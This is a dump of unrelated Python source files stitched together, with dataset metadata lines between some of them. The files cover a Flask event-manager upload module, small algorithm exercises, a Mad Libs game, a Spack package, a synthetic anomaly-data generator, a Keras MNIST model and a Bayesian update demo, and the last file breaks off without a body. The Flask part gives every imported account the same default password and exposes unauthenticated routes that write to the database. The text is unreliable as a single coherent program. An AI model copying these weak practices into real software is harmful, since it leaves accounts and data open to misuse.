def send_emails():
    """Render the bulk-email page; on submit, mail the selected event's
    template to every recipient listed in the uploaded spreadsheet."""
    # full_name = g.user.full_name
    # status = g.user.status
    user_id = g.user.user_id
    # menus = menus_of_role()
    form = SendEmailsForm()
    form.set_options()
    if form.validate_on_submit():
        filename = secure_filename(form.upload.data.filename)
        fpath = UPLOAD_FOLDER + filename
        event_id = form.event_id.data
        event = db.session.query(Event).filter(Event.event_id == event_id).first()
        template = event.email_template
        form.upload.data.save(fpath)
        send_email_to_user(fpath, template, event_id)
        message=" import successfully"
    else:
        filename = None
        message=" import failed"
    return render_template('upload/send_emails.html', form=form, filename=filename,message=message,full_name=full_name, menu_categories=menu_categories, status=status)
@upload.route('/template')
@login_required
def download():
    """Serve one of the bundled xlsx import templates as an attachment.

    Selected by the ``id`` query parameter: 'users', 'topic', or anything
    else for the event template.
    """
    template_id = request.args.get('id')
    file_path = os.path.join(current_app.root_path, '../templatexlsx')
    if template_id == 'users':
        filename = 'users_template.xlsx'
    elif template_id == 'topic':
        filename = 'topic_template.xlsx'
    else:
        filename = 'event_template.xlsx'
    # Removed a leftover debug print of the chosen filename.
    return send_from_directory(directory=file_path, filename=filename,as_attachment=True,attachment_filename=filename)
def send_email_to_user(path, template, event_id):
    """Email the event invitation `template` to every (email, name) row of
    the spreadsheet at `path`, with per-recipient accept/reject links.

    NOTE(review): `basic_url` is not defined in this module — presumably a
    global from elsewhere in the package; verify it is importable here.
    """
    data = open_excel(path)
    table=data.sheets()[0]
    nrows=table.nrows
    books=[]
    accept = "accept"
    reject = "reject"
    for i in range(nrows):
        ss=table.row_values(i)
        # Row 0 is the header.
        if i == 0:
            continue
        email = ss[0]
        full_name = ss[1]
        accept_link = basic_url + url_for('upload.user_status') + '?event_id=' + event_id +'&email='+email+'&full_name='+full_name+'&choose=' + accept
        reject_link = basic_url + url_for('upload.user_status') + '?event_id=' + event_id + '&email='+email+'&full_name='+full_name+'&choose=' + reject
        send_email('Event Manager', ADMINS[0], [email], "Hello just for testing", \
            render_template(template, full_name=full_name, accept_link= accept_link, reject_link= reject_link))
@upload.route('/user_status')
def user_status():
    """Landing page for the accept/reject links sent by send_email_to_user.

    On "accept" it records the attendee and sends a confirmation email;
    anything else (including unknown events) renders a generic thank-you.
    """
    full_name = request.args.get("full_name")
    event_id = request.args.get("event_id")
    choose = request.args.get("choose")
    email = request.args.get("email")
    event = db.session.query(Event).filter(Event.event_id == event_id).first()
    if event is not None and choose == "accept":
        temp = EventAttender(event_id, full_name ,email)
        db.session.add(temp)
        db.session.commit()
        send_email('Event Manager', ADMINS[0], [email], "reply", \
            render_template("upload/accept_reply.html", full_name=full_name))
        msg = 'Thank you for joining ' + event.name
        result = 'Succeeded'
    else:
        msg = 'Thank you'
        result = 'Failed'
    return render_template('upload/reply_result.html', msg=msg, result=result, full_name= full_name)
def open_excel(path):
    """Open the Excel workbook at `path`.

    Returns the xlrd workbook, or None after printing the error when the
    file cannot be opened (best-effort behaviour kept from the original).
    """
    try:
        return xlrd.open_workbook(path)
    except Exception as e:
        print (str(e))
def input_user_xls(path):
    """Bulk-import users from the spreadsheet at `path` (9 columns per user).

    Rows whose user_id already exists (or is empty) are skipped with a
    console message; everything else is inserted with a default password.
    """
    data = open_excel(path)
    table=data.sheets()[0]
    nrows=table.nrows
    books=[]
    for i in range(nrows):
        ss=table.row_values(i)
        # Row 0 is the header.
        if i == 0:
            continue
        # result = []
        index = 0;
        tempss = []
        # Accumulate cells; every 9 cells form one user record.
        for s in ss:
            tempss.append(s)
            index = index + 1
            if index == 9:
                speaker_id = tempss[0]
                rolename = tempss[1]
                last_name = tempss[2]
                first_name = tempss[3]
                job = tempss[4]
                department = tempss[5]
                country = tempss[6]
                email = tempss[7]
                s1 = tempss[8]
                # The id cell may contain "id,extra"; keep only the id part.
                user_id = ifcomma(s1)
                title = ''
                # Every imported account starts with the same default password.
                password = hash_password = generate_password_hash("init123")
                # "Mr."/"Ms." in the job column is actually a title.
                if job == 'Mr.' or job == 'Ms.':
                    title = job
                    job = ''
                active_code = generate_active_code()
                usertemp = db.session.query(User).filter(User.user_id == user_id).first()
                if usertemp is not None or user_id == '' or user_id is None:
                    print('user'+user_id+' already exists')
                else:
                    temp=User(user_id, email, password, first_name, last_name, department,active_code,title, job, country, rolename, speaker_id)
                    db.session.add(temp)
                    db.session.commit()
                tempss = []
                index = 0
def input_topic_xls(path):
    """Bulk-import topics from the spreadsheet at `path` (13 columns per row).

    NOTE(review): `status` is only assigned for 'Accepted'/'Rejected' rows;
    any other status text raises NameError (or reuses the module-level
    `status` global) when constructing the Topic — verify the input data.
    Also note `format` shadows the builtin of the same name.
    """
    data = open_excel(path)
    table=data.sheets()[0]
    nrows=table.nrows
    books=[]
    for i in range(nrows):
        ss=table.row_values(i)
        # Row 0 is the header.
        if i == 0:
            continue
        topic_id = ss[0]
        statustemp = ss[1]
        format = ss[2]
        content = ss[3]
        title = ss[4]
        description = ss[5]
        memo = ss[6]
        # Speaker cells may contain "id,extra"; keep only the id part.
        speaker1 = ifcomma(ss[7])
        speaker2 = ifcomma(ss[8])
        speaker3 = ifcomma(ss[9])
        speaker4 = ifcomma(ss[10])
        speaker5 = ifcomma(ss[11])
        create_by = ifcomma(ss[12])
        if statustemp == 'Accepted':
            status = 'AP'
        elif statustemp == 'Rejected':
            status = 'RJ'
        # Defaults for fields not present in the spreadsheet.
        min_attendance = 0
        max_attendance = 0
        day_duration = '0'
        hour_duration = '0'
        minute_duration = '20'
        year_start = '2016'
        month_start = ''
        day_start = ''
        location = ''
        link = ''
        jamlink = ''
        topictemp = db.session.query(Topic).filter(Topic.topic_id == topic_id).first()
        if topictemp is not None or topic_id == '' or topic_id is None:
            print(topic_id+'Topic already exists')
        else:
            temp=Topic(topic_id,title, description, min_attendance, max_attendance, speaker1, speaker2, speaker3, speaker4, speaker5, \
                year_start, month_start, day_start,day_duration, hour_duration, minute_duration ,create_by,\
                content, format, location, link, jamlink, memo, status)
            db.session.add(temp)
            db.session.commit()
def ifcomma(data):
    """Return the portion of `data` before the first comma.

    Spreadsheet cells sometimes contain "id,extra" pairs; only the id part
    is wanted.  Strings without a comma are returned unchanged.
    """
    # str.split with maxsplit=1 handles both the comma and no-comma cases,
    # replacing the previous re.search-based branching.
    return data.split(',', 1)[0]
def uploadtest():
    """Console smoke-test helper: report that the upload path is reachable."""
    message = "upload successfully"
    print(message)
# Debug-only endpoint: imports a fixed test spreadsheet into the user table.
@upload.route('/test')
def test():
    input_user_xls('uploads/test2.xlsx')
#Refresh the global variable before every request
@upload.before_request
def before_request():
    """Bind the current user to g and refresh the module-level view globals
    (full_name, status, menu_categories) used by the templates."""
    g.user = current_user
    global full_name, status, menu_categories
    # Anonymous users lack these attributes, hence the hasattr guards.
    if hasattr(g.user, 'full_name'):
        full_name = g.user.full_name
    if hasattr(g.user, 'status'):
        status = g.user.status
    menu_categories = menus_of_role()
def generate_active_code():
    """Return a 4-character activation code of distinct ASCII letters.

    NOTE: uses the `random` module, as the original did; for
    security-sensitive codes `secrets` would be preferable.
    """
    pool = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
    # random.sample draws four distinct characters from the pool.
    return ''.join(random.sample(pool, 4))
def menus_of_role():
    """Build the menu tree visible to the current user's role.

    Returns a list of category dicts, each with 'category_id',
    'category_name' and a 'menus' list of {menu_id, menu_name, url} dicts
    restricted to the menus granted to g.user.role_id.
    """
    middles = db.session.query(Role_menu).filter(Role_menu.role_id == g.user.role_id).all()
    menu_categories = list()
    cat_grouped_menus = list()   # one representative menu per distinct category
    category_ids = list()
    menu_ids = list()            # every menu id this role may see
    for m in middles:
        certain_menu = db.session.query(Menu).filter(Menu.menu_id == m.menu_id).first()
        menu_ids.append(certain_menu.menu_id)
        if certain_menu.category_id not in category_ids:
            category_ids.append(certain_menu.category_id)
            cat_grouped_menus.append(certain_menu)
    for c in cat_grouped_menus:
        c_menus = list()
        cat = dict()
        cat['category_id'] = c.category_id
        cat['category_name'] = c.category_name
        menus = db.session.query(Menu).filter(Menu.category_id == c.category_id).filter().all()
        for m in menus:
            # Keep only the menus actually granted to this role.
            if m.menu_id in menu_ids:
                each_menu = dict()
                each_menu['menu_id'] = m.menu_id
                each_menu['menu_name'] = m.menu_name
                each_menu['url'] = m.url
                c_menus.append(each_menu)
        cat['menus'] = c_menus
        menu_categories.append(cat)
    # print (menu_categories)
    return menu_categories
# ---- dataset metadata (repo: yefeiyang0806/Event-Manager, file: upload/views.py) ----
def transpose(matrix: [[int]]) -> [[int]]:
    """Return the transpose of a rectangular matrix (list of rows).

    Generalized over the original index-based version: an empty matrix now
    returns [] instead of raising IndexError on `matrix[0]`.  (Also removed
    a dataset seq-id that was fused onto the `def` line.)
    """
    # zip(*rows) walks the columns; each column tuple becomes a row list.
    return [list(column) for column in zip(*matrix)]
if __name__ == '__main__':
    # Manual smoke test: expect [[1, 4, 7, 0], [2, 5, 8, 0], [3, 6, 9, 0]].
    print(transpose([[1,2,3],[4,5,6],[7,8,9],[0,0,0]]))
# ---- dataset metadata (repo: Lycorisophy/LeetCode_python, file: 867.转置矩阵.py) ----
# FIX: removed a dataset seq-id ("36665221537 | ") fused onto the first line.
# Reads N item descriptions and a capacity W, then greedily takes the
# highest-valued items first (fractional knapsack with unit granularity).
INPUT = [int(i) for i in input().split()]
N, W = INPUT[0], INPUT[1]
TC = 0
CHEESE = []
# Each row: presumably [value per unit, units available] — order matters below.
for i in range(N):
    INPUT = [int(x) for x in input().split()]
    CHEESE.append([INPUT[0], INPUT[1]])
# Sort by value per unit, highest first.
CHEESE = sorted(CHEESE, reverse=True)
for c in CHEESE:
    TC += c[0] * min(W, c[1])
    W -= min(W, c[1])
    if W <= 0:
        break
print(TC)
# ---- dataset metadata (repo: ringedSquid/Stuy_CCC_Potd, file: abc229_c.py) ----
""" Mad Libs Generator """
# story 1
def p_story1():
    """Print the 'Zoo' story filled in with the module-level word globals."""
    print("************************")
    print("Zoo")
    print("************************")
    print(f"Today I went to the zoo. I saw a(n) {adjective1} {noun1} jumping up and down on its tree. "
          f"He {verb_p1} {adverb1} through the large tunnel that led to its {adjective2} {noun2}. "
          f"I got some peanuts and passed them through the cage to a gigantic gray {noun3} towering above my head. "
          # FIX: "mademe" -> "made me" in the printed story text.
          f"Feeding that animal made me hungry. "
          f"I went to get a {adjective3} scoop of ice cream. "
          # FIX: added the missing space between "bus." and "When".
          f"It filled my stomach. Afterwards I had to {verb1} {adverb2} to catch our bus. "
          f"When I got home I {verb_p2} my mom for a {adjective4} day at the zoo.")
    print("************************")
#story 2
def p_story2():
    """Print the 'Jungle' story filled in with the module-level word globals.

    NOTE(review): several placeholders (adjective1-3, verb1-2, noun1) are
    deliberately reused within this template.
    """
    print("************************")
    print ("Jungle")
    print("************************")
    print (f"I walk through the color jungle. I take out my {adjective1} canteen. "
           f"There's a {adjective2} parrot with a {adjective3} {noun1} in his mouth right there in front "
           f"of me in the {adjective4} trees! I gaze at his {adjective1} {noun2}. "
           f"A sudden sound awakes me from my daydream! "
           f"A panther’s {verb1} in front of my head! I {verb2} his {adjective2} breath. I remember I have a packet of {noun3} "
           f"that makes go into a deep slumber! I {verb1} it away from me in front of the {noun1}. Yes he's eating it! "
           f"I {verb2} away through the {adjective3} jungle. "
           f"I meet my parents at the tent. Phew! It’s been an exciting day in the jungle. ")
    print("************************")
# All the questions that the program asks the user
print("Select story. ")
print("1. Zoo")
print("2. Jungle")
print("3. story")
print("4. story")
print("Type 'quit' to exit")
print(" ")

run = True
while run:
    choice = input("Enter story number: ")
    if choice in ('1', '2', '3', '4'):
        # Hard-coded words; the interactive prompts are kept below, commented out.
        noun1 = 'monkey'
        noun2 = 'cat'
        noun3 = 'elephant'
        adjective1 = 'naughty'
        adjective2 = 'fat'
        adjective3 = 'big'
        adjective4 = 'amazing'
        verb1 = 'run'
        verb2 = 'jump'
        adverb1 = 'blind'
        adverb2 = 'fast'
        verb_p1 = 'slided'
        verb_p2 = 'told'
        """
        noun1 = input("Choose a noun: ")
        noun2 = input("Choose a noun: ")
        noun3 = input("Choose a noun: ")
        adjective1 = input("Choose an adjective: ")
        adjective2 = input("Choose an adjective: ")
        adjective3 = input("Choose an adjective: ")
        adjective4 = input("Choose an adjective: ")
        verb1 = input("Choose a verb: ")
        verb2 = input("Choose a verb: ")
        adverb1 = input("Choose a adverb: ")
        adverb2 = input("Choose a adverb: ")
        verb_p1 = input("Choose a verb in past tense: ")
        verb_p2 = input("Choose a verb in past tense: ")
        """
        if choice == '1':
            print("Zoo Story selected")
            # FIX: call the story directly; print(p_story1()) also printed
            # "None" because the story functions return nothing.
            p_story1()
        elif choice == '2':
            print("Jungle Story selected")
            p_story2()
        elif choice == '3':
            print("story 3")
        elif choice == '4':
            print("story 4")
    else:
        if choice == "quit":
            print("Quiting")
            # FIX: stripped dataset metadata fused onto this line in the dump.
            run = False
import math
import sys
# Faster buffered input for competitive-programming style reading.
input = sys.stdin.readline
a, b, c = map(int, input().split())
# For each axis, cut the a*b*c block into two slabs as close to the middle
# as whole layers allow, and compute the absolute volume difference of the
# two pieces.  Since x <= a*b*c, abs(abs(x - a*b*c) - x) == |a*b*c - 2*x|.
x = (a//2)*b*c
x = abs(abs(x-a*b*c)-x)
y = (b//2)*a*c
y = abs(abs(y-a*b*c)-y)
z = (c//2)*a*b
z = abs(abs(z-a*b*c)-z)
print(min(x, y, z)) | Aasthaengg/IBMdataset | Python_codes/p04005/s565092068.py | s565092068.py | py | 224 | python | en | code | 0 | github-code | 90 |
27091794058 | from spack import *
class Lordec(MakefilePackage):
    """LoRDEC is a program to correct sequencing errors in long reads from
    3rd generation sequencing with high error rate, and is especially
    intended for PacBio reads."""
    homepage = "http://www.atgc-montpellier.fr/lordec/"
    url = "https://gite.lirmm.fr/lordec/lordec-releases/uploads/e3116a5f251e46e47f7a3b7ddb2bd7f6/lordec-src_0.8.tar.gz"
    # Second argument is the md5 checksum of the release tarball.
    version('0.8', 'd5a57db681d1cd31c516aa780ce53f9d')
    depends_on('boost')
    # cmake is only needed while building, not at run time.
    depends_on('cmake@3.1.0:', type='build')
    # Run `make clean all` so no stale objects leak into the build.
    build_targets = ['clean', 'all']
    def install(self, spec, prefix):
        # The Makefile has no install target; copy the entire build tree
        # into <prefix>/bin as-is.
        install_tree('.', prefix.bin)
| matzke1/spack | var/spack/repos/builtin/packages/lordec/package.py | package.py | py | 654 | python | en | code | 2 | github-code | 90 |
28265589091 | #########################################################################
# ---------> FILE: gen.py
# ---------> AUTHOR: Max Xu
# ---------> MAIL: xuhuan@live.cn
# ---------> DATE: 05/03/2017 TIME:11:25:55
#########################################################################
# !/usr/bin/env python
# coding=utf-8
import os
import sys
import csv
import time
from datetime import datetime
import numpy as np
import pandas as pd
from pandas import Series, DataFrame
# Time axis of the generated series: one sample per hour across 2010.
DATE_START_TIME = "2010-1-1 10:00:00"
DATE_END_TIME = "2010-12-31 23:00:00"
DATE_FREQUENCY = "H"
# Labels written into the "tag" column of the output CSV.
TAG_NEGTIVE = "normal"
TAG_POSITIVE = "anormal"
OUTPUT_FILE = '../dataset/data.csv'
ANORMAL_COUNT = 3  # number of anomalous bursts to inject
ANORMAL_PERCENT = 20  # burst length: anormal_size = data_size / percent
def gen_0():
    """Write an hourly two-channel series (v0 noisy constant, v1 sine) to
    OUTPUT_FILE as CSV.

    Every 78th sample has +1 added to both channels and is tagged
    TAG_POSITIVE; all other rows are tagged TAG_NEGTIVE.
    """
    # newline='' is required by the csv module so rows are not double-spaced
    # on platforms with \r\n line endings.
    with open(OUTPUT_FILE, 'w', newline='') as f:
        # timestamp axis
        timestamp = pd.date_range(DATE_START_TIME, DATE_END_TIME, freq=DATE_FREQUENCY)
        data_size = len(timestamp)
        # v0: uniform noise around 1.0
        v0_data = np.random.uniform(0, 0.1, size=data_size) + 1
        # v1: sine wave sampled at step 0.01.  Only the first data_size
        # values are consumed below, so generate exactly data_size samples;
        # the original arange(0, data_size * 100, 0.01) allocated a throwaway
        # array ~10000x larger than needed.
        t = np.arange(data_size) * 0.01
        v1_data = np.sin(2 * np.pi * t) + 1
        headers = ["timestamp", "v0", "v1", "tag"]
        writer = csv.DictWriter(f, fieldnames=headers, extrasaction="ignore")
        writer.writeheader()
        for (i, ts) in enumerate(timestamp):
            if i % 78 == 0:
                # Anomalous sample: shift both channels up by 1.
                row = [ts, v0_data[i] + 1, v1_data[i] + 1, TAG_POSITIVE]
            else:
                row = [ts, v0_data[i], v1_data[i], TAG_NEGTIVE]
            row = dict(zip(headers, row))
            writer.writerow(row)
            print(row)
def gen_1():
    """Write a single-channel series (sum of two sines plus Gaussian noise)
    to OUTPUT_FILE as CSV, with ANORMAL_COUNT higher-frequency bursts
    injected at random positions and tagged TAG_POSITIVE.
    """
    # newline='' is required by the csv module so rows are not double-spaced
    # on platforms with \r\n line endings.
    with open(OUTPUT_FILE, 'w', newline='') as f:
        # timestamp axis
        timestamp = pd.date_range(DATE_START_TIME, DATE_END_TIME, freq=DATE_FREQUENCY)
        data_size = len(timestamp)
        # tag defaults to "normal" everywhere
        tag = [TAG_NEGTIVE] * data_size
        # Base signal.  np.arange(data_size) * 0.01 yields exactly data_size
        # samples (a float stop value can round to one sample short or long).
        t = np.arange(data_size) * 0.01
        wave1 = np.sin(2 * 2 * np.pi * t) + 1
        noise = np.random.normal(0, 0.1, len(t))
        wave1 = wave1 + noise
        wave2 = np.sin(2 * np.pi * t)
        # Anomaly template: a short burst of a higher-frequency sine.
        anormal_size = int(round(data_size / ANORMAL_PERCENT))
        t_anormal = np.arange(anormal_size) * 0.01
        wave3 = np.sin(10 * np.pi * t_anormal)
        # Randomly insert the burst ANORMAL_COUNT times.
        for position in np.random.rand(ANORMAL_COUNT):
            insert = int(round(position * len(t)))
            # Clamp so the burst always fits.  The original code raised a
            # broadcasting ValueError whenever a random position fell closer
            # than anormal_size to the end of the series.
            insert = min(insert, len(t) - anormal_size)
            wave1[insert:insert + anormal_size] = wave1[insert:insert + anormal_size] + wave3
            tag[insert:insert + anormal_size] = [TAG_POSITIVE] * anormal_size
        # v0
        v0_data = wave1 + wave2
        headers = ["timestamp", "v0", "tag"]
        writer = csv.DictWriter(f, fieldnames=headers, extrasaction="ignore")
        writer.writeheader()
        for (i, ts) in enumerate(timestamp):
            row = dict(zip(headers, [ts, v0_data[i], tag[i]]))
            writer.writerow(row)
            print(row)
def main():
    """Entry point: generate the default (gen_1) dataset."""
    gen_1()
if __name__ == "__main__":
    # Time the generation run and report wall-clock usage.
    start = time.time()
    print("Start: " + str(start))
    main()
    elapsed = (time.time() - start)
    print("Time Usage: " + str(elapsed))
| maxsxu/MTSAnomalyDetection | util/gen_data.py | gen_data.py | py | 4,358 | python | en | code | 25 | github-code | 90 |
27308750631 | from gold.statistic.MagicStatFactory import MagicStatFactory
from gold.statistic.Statistic import Statistic
from gold.statistic.GraphStat import GraphStat
from quick.statistic.PositionToGraphNodeIdStat import PositionToGraphNodeIdStat
from gold.statistic.FormatSpecStat import FormatSpecStat
from gold.track.TrackFormat import TrackFormatReq
import numpy as np
#from quick.util.CommonFunctions import isNan
#class ColocalizationIn3dAssumingCompleteGraphStatSplittable(StatisticSumResSplittable):
# pass
class ColocalizationIn3dAssumingCompleteGraphStat(MagicStatFactory):
    # Factory stub: MagicStatFactory presumably resolves this name to the
    # *Unsplittable implementation in this module — TODO confirm against
    # MagicStatFactory's lookup convention.
    pass
class ColocalizationIn3dAssumingCompleteGraphStatUnsplittable(Statistic):
    """Mean edge weight of the subgraph of track's graph induced by the node
    ids that track2's positions map onto (NaN edges excluded from the mean).
    """

    def _compute(self):
        graph = self._graphStat.getResult()
        subgraph_ids = self._position2NodeId.getResult()
        subgraph = graph.getNewSubGraphFromNodeIdSet(subgraph_ids)
        subgraph_as_matrix = subgraph.getMatrixFromCompleteGraph()
        if subgraph_as_matrix is None:
            return None
        # Mask NaN entries so they do not contribute to the mean.
        masked = np.ma.masked_array(subgraph_as_matrix, np.isnan(subgraph_as_matrix))
        res = np.ma.mean(masked)
        # When every entry is masked, np.ma.mean returns the masked constant;
        # report that as "no result" instead of leaking a masked value.
        if isinstance(res, np.ma.core.MaskedConstant):
            res = None
        return res

    def _createChildren(self):
        self._graphStat = self._addChild(GraphStat(self._region, self._track))
        self._position2NodeId = self._addChild(PositionToGraphNodeIdStat(self._region, self._track, self._track2))
        # Force track2 into a non-overlapping representation.
        dummyStat = self._addChild(FormatSpecStat(self._region, self._track2, TrackFormatReq(allowOverlaps=False)))
| uio-bmi/track_rand | lib/hb/quick/statistic/ColocalizationIn3dAssumingCompleteGraphStat.py | ColocalizationIn3dAssumingCompleteGraphStat.py | py | 1,942 | python | en | code | 1 | github-code | 90 |
22211679449 | from scipy.stats import beta
from scipy.stats import bernoulli as bern
import numpy as np
import matplotlib.pyplot as plt
def main():
    """Sequential Bayesian updating of a Bernoulli parameter.

    Draws 400 Bernoulli samples (true mu = 0.7), splits them into 4 equal
    batches, and plots the Beta posterior after each batch on top of the
    Beta(0.5, 0.5) prior.
    """
    num_batches = 4
    train_size = 400
    batch_size = int(train_size / num_batches)
    true_mu = 0.7  # the real parameter generating the data
    samples = bern.rvs(true_mu, size=train_size).reshape([num_batches, -1])
    # Beta prior: the conjugate prior of the Bernoulli likelihood.
    a, b = 0.5, 0.5
    plot_beta(a, b, "Prior")
    # Update the posterior one batch at a time and plot each stage.
    for batch_index, batch in enumerate(samples, start=1):
        a = learn_a(a, batch)
        b = learn_b(b, batch)
        plot_beta(a, b, label='N=' + str(batch_index * batch_size))
    plt.legend(loc='upper left')
    plt.show()
def plot_beta(a, b, label=""):
    """Draw the Beta(a, b) probability density on the current pyplot axes."""
    grid = np.arange(0, 1, 0.001)
    density = beta.pdf(grid, a, b)
    plt.plot(grid, density, label=label)
def learn_a(a, X):
    """Posterior alpha: prior alpha plus the number of successes in X."""
    successes = sum(X)
    return successes + a
def learn_b(b, X):
    """Posterior beta: prior beta plus the number of failures in X.

    Uses len() rather than numpy's .shape[0] so plain Python sequences are
    accepted as well as 1-D arrays (len() equals shape[0] for arrays).
    """
    return len(X) - sum(X) + b
if __name__ == "__main__":
    # Run the demo only when executed as a script, not on import.
    main()
| elkel53930/machine_learning_by_bayes | ch03/bern.py | bern.py | py | 977 | python | en | code | 0 | github-code | 90 |
31114067596 | #!/usr/bin/python3
import sys
# Hadoop-streaming mapper: for every CSV line on stdin, emit
# "country<TAB>city<TAB>2021-value", keeping only letters in the names.
for raw_line in sys.stdin:
    fields = raw_line.strip().split(",")
    city = fields[1]
    country = fields[2]
    year_2021 = fields[3]
    # Strip every non-alphabetic character (digits, spaces, punctuation).
    clean_city = "".join(filter(str.isalpha, city))
    clean_country = "".join(filter(str.isalpha, country))
    print('{0}\t{1}\t{2}'.format(clean_country, clean_city, year_2021))
| gabrielecosta/big-data-dataset | inquinamento/mapper.py | mapper.py | py | 389 | python | en | code | 0 | github-code | 90 |
804565301 | expected_outcomes = {"X": "LOSE", "Y": "DRAW", "Z": "WIN"}
# Round format: column 0 is the opponent's move (A/B/C), column 1 is the
# required outcome for us (X=lose, Y=draw, Z=win) — see expected_outcomes.
# For each opponent move, the reply (X/Y/Z) that wins / draws / loses:
winning_outcomes = {"A": "Y", "B": "Z", "C": "X"}
draw_outcomes = {"A": "X", "B": "Y", "C": "Z"}
losing_outcomes = {"A": "Z", "B": "X", "C": "Y"}
# Score contributions: shape we played, plus the round outcome.
move_scores = {"X": 1, "Y": 2, "Z": 3}
outcome_scores = {"WIN": 6, "DRAW": 3, "LOSE": 0}
# Tally the total score across every round listed in the input file.
total_score = 0
with open("input.txt", "r") as file:
    for line in file.readlines():
        parts = line.split()
        required = expected_outcomes[parts[1]]
        total_score += outcome_scores[required]
        # Add the shape score of the move that produces the required outcome
        # against the opponent's move parts[0].
        if required == "WIN":
            total_score += move_scores[winning_outcomes[parts[0]]]
        elif required == "DRAW":
            total_score += move_scores[draw_outcomes[parts[0]]]
        else:
            total_score += move_scores[losing_outcomes[parts[0]]]
print(total_score) | kneedels/adventOfCode2022 | day2/part2.py | part2.py | py | 829 | python | en | code | 0 | github-code | 90 |
24261443392 | from tensorflow.examples.tutorials.mnist import input_data
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Activation, Convolution2D, MaxPooling2D, Dropout, Flatten
from keras.utils import np_utils
# mnist = input_data.read_data_sets("MNIST_data/", one_hot=True)
# Build a small CNN for 10-class MNIST digit classification.
model = Sequential()
# Conv block 1: 3x3 filters, 1 input channel -> 32 feature maps.
model.add(Convolution2D(nb_filter=32, nb_row=3, nb_col=3, border_mode='same', input_shape=(28, 28, 1)))
model.add(Activation('relu'))
# Conv block 2: 3x3 filters, 32 -> 64 feature maps.
model.add(Convolution2D(nb_filter=64, nb_row=3, nb_col=3, border_mode='same'))
model.add(Activation('relu'))
model.add(Flatten())
# Fully connected layer with dropout.
model.add(Dense(output_dim=1024))
model.add(Activation('relu'))
model.add(Dropout(0.5))
# Output: 10-way softmax over the digit classes.
model.add(Dense(output_dim=10))
model.add(Activation('softmax'))
model.summary()
# BUG FIX: the original compiled with loss='binary_crossentropy', which is
# wrong for a 10-class one-hot softmax output and makes Keras report a
# misleadingly high "accuracy"; one-hot multi-class targets require
# categorical_crossentropy.
model.compile(optimizer='sgd', loss='categorical_crossentropy', metrics=['accuracy'])
img_rows, img_cols = 28, 28
(X_train, y_train), (X_test, y_test) = mnist.load_data()
# Add the trailing channel dimension expected by the conv layers.
# NOTE(review): pixels are left as raw 0-255 values; scaling to [0, 1]
# would likely help SGD converge — confirm before changing.
X_train = X_train.reshape(X_train.shape[0], img_rows, img_cols, 1)
X_test = X_test.reshape(X_test.shape[0], img_rows, img_cols, 1)
nb_classes = 10
# One-hot encode the integer labels.
Y_train = np_utils.to_categorical(y_train, nb_classes)
Y_test = np_utils.to_categorical(y_test, nb_classes)
input_shape = (img_rows, img_cols, 1)
# One epoch = one full pass over the training data.
model.fit(X_train, Y_train, nb_epoch=1, batch_size=100, verbose=1)
score = model.evaluate(X_test, Y_test, verbose=1)
print()
# score is [test loss, test accuracy].
print(score)
| tsuchikazu/playground | machine-leaning/keras/Deep_MNIST_for_Experts.py | Deep_MNIST_for_Experts.py | py | 1,989 | python | en | code | 0 | github-code | 90 |
4951934666 | # [기초-2차원배열] 바둑알 십자 뒤집기
# [Basics - 2D arrays] Flipping stones in a cross pattern (CodeUp 1097).
# A 19x19 board of white ('1') / black ('0') stones is read in.  For each of
# n coordinates, every stone in that row and that column is flipped; the
# pivot cell is flipped twice (once per pass) and so ends up unchanged.
# Finally the whole board is printed, one trailing space after each cell.
board = []
for _ in range(19):
    board.append(input().split())  # cells stay as the strings '0' / '1'
n = int(input())
for _ in range(n):
    row, col = map(int, input().split())
    # Flip the whole row (done first, matching the original order)...
    for c in range(19):
        board[row - 1][c] = '1' if board[row - 1][c] == '0' else '0'
    # ...then the whole column.
    for r in range(19):
        board[r][col - 1] = '1' if board[r][col - 1] == '0' else '0'
for board_row in board:
    for cell in board_row:
        print(cell, end=' ')
    print()
# # 다른 출력 방법
# for x in range(19):
# for y in range(19):
# print(m[x][y], end=' ')
# print()
# 모범답안
# m=[]
# for i in range(20) :
# m.append([])
# for j in range(20) :
# m[i].append(0)
# for i in range(19) :
# a=input().split()
# for j in range(19) :
# m[i+1][j+1]=int(a[j])
# n=int(input())
# for i in range(n) :
# x,y=input().split()
# for j in range(1, 20) :
# if m[j][int(y)]==0 :
# m[j][int(y)]=1
# else :
# m[j][int(y)]=0
# if m[int(x)][j]==0 :
# m[int(x)][j]=1
# else :
# m[int(x)][j]=0
# for i in range(1, 20) :
# for j in range(1, 20) :
# print(m[i][j], end=' ')
# print() | jsj0718/til-study-legacy | Algorithm/CodeUp100/1097.py | 1097.py | py | 2,032 | python | ko | code | 0 | github-code | 90 |
18158626939 | from functools import reduce
from fractions import gcd
import math
import bisect
import itertools
import sys
sys.setrecursionlimit(10000000)
# Faster buffered input for competitive-programming style reading.
input = sys.stdin.readline
INF = float("inf")
# Contest modulus: the prime 1e9 + 7.
MOD = 1000000007
class Combination(object):
    """Precomputed factorial tables for C(n, k) modulo a prime.

    Builds factorials, modular inverses and inverse factorials up to N in
    O(N) so each com(n, k) query answers in O(1).
    """

    def __init__(self, N, mod=1000000007):
        """Precompute tables up to N.

        `mod` defaults to the module-wide prime MOD (1e9+7), so existing
        callers are unaffected; passing another prime generalizes the table.
        """
        self.mod = mod
        self.fac = [0] * (N + 1)   # fac[i]  = i!          mod `mod`
        self.inv = [0] * (N + 1)   # inv[i]  = i^{-1}      mod `mod`
        self.finv = [0] * (N + 1)  # finv[i] = (i!)^{-1}   mod `mod`
        self.fac[0] = 1
        self.finv[0] = 1
        if N > 0:
            self.fac[1] = 1
            self.inv[1] = 1
            self.finv[1] = 1
        for i in range(2, N + 1):
            self.fac[i] = self.fac[i - 1] * i % mod
            # Standard O(1) recurrence for modular inverses w.r.t. a prime:
            # inv[i] = -(mod // i) * inv[mod % i]  (mod `mod`)
            self.inv[i] = self.inv[mod % i] * (mod - (mod // i)) % mod
            self.finv[i] = self.finv[i - 1] * self.inv[i] % mod

    def com(self, N, k):
        """Return C(N, k) mod `mod`.

        Out-of-range k (k < 0 or k > N) now returns 0 instead of silently
        indexing finv[-1] and producing a wrong value.
        """
        if k < 0 or k > N:
            return 0
        return (self.fac[N] * self.finv[k] * self.finv[N - k]) % self.mod
# Solution body.
def main():
    """Count ordered ways to write S as a sum of parts each >= 3, mod 1e9+7.

    For a split into `parts` pieces, subtracting the mandatory 3 from each
    leaves `remaining` to distribute freely, which by stars-and-bars gives
    C(remaining + parts - 1, parts - 1) compositions.
    """
